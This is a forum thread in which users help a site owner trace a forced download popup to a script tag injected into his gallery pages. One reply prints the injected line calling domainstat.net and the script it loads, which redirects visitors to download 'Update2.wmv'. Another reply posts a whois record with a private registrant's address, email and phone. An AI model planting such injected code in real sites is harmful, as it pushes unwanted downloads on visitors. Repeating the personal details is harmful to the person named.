how-to block ads
|
SandShark
So it goes
Premium,MVM
join:2000-05-23
Santa Fe, TX
clubs:
 ·Verizon Online DSL
|  Weird Download Popup
Thinking I might have gotten spyware or a virus on that machine, I tried on three other machines: my PowerBook (OS X 10.4.3), my wife's (Windows XP), and my daughter's (Windows XP). On all three, that same file is wanting to be downloaded. I have Avast! v4.6 Antivirus and Windows Firewall on all three Windows machines, and all are connected to a Linksys router, if that helps.
Any ideas what's going on? Thanks.
--
BioWillie | |
|  
Greg_Z
Premium
join:2001-08-08
Springfield, IL
 ·Comcast
1 edit | Re: Weird Download Popup I had no problems going to your site www oldbaldandgrumpy com. It is possible that if you are using PHP on your site, and have not taken the proper precautions, it could be that your server with Hostdime may of gotten infected.
When I went to your site, I did not get the pop-up, and went straight to the site. Also server1cuatui.com is a TuCows hosted site.
Result for server1cuatui.com
--> fwhois server1cuatui.com@whois.internic.net
[whois.internic.net]
Whois Server Version 1.3
Domain names in the .com and .net domains can now be registered
Domain Name: SERVER1CUATUI.COM
Registrar: TUCOWS INC.
Whois Server: whois.opensrs.net
Referral URL: »domainhelp.tucows.com
Name Server: NS1.HOSTSAVE.COM
Name Server: NS2.HOSTSAVE.COM
Name Server: NS3.HOSTSAVE.COM
Status: REGISTRAR-LOCK
Updated Date: 24-aug-2005
Creation Date: 24-aug-2005
Expiration Date: 24-aug-2006
The Registry database contains ONLY .COM, .NET, .EDU domains and
--> fwhois server1cuatui.com@whois.opensrs.net:whois
[whois.opensrs.net]
Registrant:
Le, huong
1240 Arkwood ave
COLUMBUS, OH 43227
US
Domain name: SERVER1CUATUI.COM
Administrative Contact:
Le, huong nivahle@yahoo.com
1240 Arkwood ave
COLUMBUS, OH 43227
US
+1.6145782634
Technical Contact:
Tech, Domain domaintech@hostsave.com
3250 W. Commercial Blvd.
Suite 200
Ft. Lauderdale, FL 33309
US
+1.9543348000
Registration Service Provider:
Affinity Internet, Inc., domainmanager@affinity.com
954-334-8000
954-334-8001 (fax)
This company may be contacted for domain DNS/Nameserver changes, and
general domain support questions.
Registrar of Record: TUCOWS, INC.
Record last updated on 27-Aug-2005.
Record expires on 24-Aug-2006.
Record created on 24-Aug-2005.
Domain servers in listed order:
NS3.HOSTSAVE.COM 207.150.198.114
NS1.HOSTSAVE.COM 207.150.196.199
NS2.HOSTSAVE.COM 207.150.197.103
Domain status: REGISTRAR-LOCK
--
One man's customer loyalty is another man's misguided arrogance. | |
| | | | sheiny
join:2005-03-13
Turlock, CA
| Well you could start by changing the login password on your admin page. Make it a strong one. You need to remove
src=****://domainstat.net/stat.php
at the top of all your pages because stat.php downloads update2.wmv. Keep an eye on this thread and you will get better, more comprehensive advice. | |
| |
SandShark
So it goes
Premium,MVM
join:2000-05-23
Santa Fe, TX
clubs:
·Verizon Online DSL
| Re: Weird Download Popup Thanks again. Is there something that makes you think my password isn't strong. It's a combination of 12 letters and numbers. I found the domainstat.net/stat.php entry in several system directory files, but it keeps coming back after I delete it.
Also, can you tell me, specifically, what might have happened? I'm led to believe that someone, perhaps the person mentioned in Greg_Z  's whois lookup, has access to and can alter files for my sight.
I have no experience or knowledge with PHP or, for that matter, any of the coding that I'm using. Someone in Digital Imaging turned me onto the software, I thought it was simple and easy, and it looked pretty. Other than that, you're "looking" at a dummy when it comes to website security and the vulnerabilities of PHP!
--
BioWillie | |
| | |
SandShark
So it goes
Premium,MVM
join:2000-05-23
Santa Fe, TX
clubs:
·Verizon Online DSL
| Re: Weird Download Popup Thanks. Far too much research for a simple site to host my images. I'm in the process of taking the site down. I don't want to cause trouble for myself, the hosting company/servers, or anyone else. I appreciate all of the help, though.
--
BioWillie | |
| | |
Greg_Z
Premium
join:2001-08-08
Springfield, IL | Re: Weird Download Popup There is this option, which I have had no problems with so far: »pics.livejournal.com/
--
One man's customer loyalty is another man's misguided arrogance. | |
| 
caffeinator
Coming soon to a cup near you..
Premium
join:2005-01-16
Spokane, WA
·WebBand
| Ok, using Opera 8.51 tried your website and indeed got that attempt to download the file. On veiwing your sourcecode for the page I quickly found the offending code on the top of your pages's code:
<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>
That, in turn goes to a script that does this:
<!--
var currentDate = new Date();
var adRecurrence = "daily";
var adId = "a1087804322";
var adExpiration = 0;
var retry=2;
var flag = 0;
var obj=null;
currentDate.setTime(currentDate.getTime() + (1*36*60*60*1000));
adExpiration = currentDate.toGMTString();
function SetCookie(sName, sValue, sExpire){
var expireCode = "";
if (sExpire) { expireCode = "expires=" + sExpire + ";" }
document.cookie = sName + "=" + escape(sValue) + ";" + expireCode
}
function GetCookie(sName) {
var aCookie = document.cookie.split("; ");
for (var i=0; i < aCookie.length; i++) {
var aCrumb = aCookie[i].split("=");
if (sName == aCrumb[0]) { return unescape(aCrumb[1]); }
}
return null;
}
function upop() {
setTimeout("location.href = 'http://www.dlfree.com/Update2.wmv'",1000);
}
if (!GetCookie(adId)) {
SetCookie(adId,"1", adExpiration);
setTimeout("upop()",10*1000);
}
//-->
That's why you are getting the popup.
Remove the Javascript code I first posted from all your header files or whatever other pages that have it.
It's been added at the very top, before the normal page starts. Tricky. ;-)
I.E., remove this code:
<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>
It's likely in your Header files, or your site template.
I doubt your host would do it...althought some crappy hosts add-in code to benefit themselves. More likely one of your permissions is set so someone has edited it themselves, or they hacked your login.
You might try posting this over on your webhost's forums as well, or email them. MG2 hasa nice forum as well that has posts about that error msg on your admin login screen ;-).
If I were you, I'd remove the semi-obvious login link for Admin on the MG2 pages as well..wouldn't be hard to brute-force attack that at all. Also stick a blank .HTML file named index.html in your /includes directory to keep people from seeing your includes...shouldn't be able to see it's files IMO.
MG2 is a nice gallery script, I've used it for some time, but the script is meant to be EZ, not secure I'm afraid.
BTW, I'd make sure your website files are backed-up..just in case someone has gotten in and decides to delete it for kicks.
Hope that helps.
CaFF
--
"Only two things are infinite, the universe and human stupidity, and I'm not sure about the former." - A. Einstein | |
| | | |
|
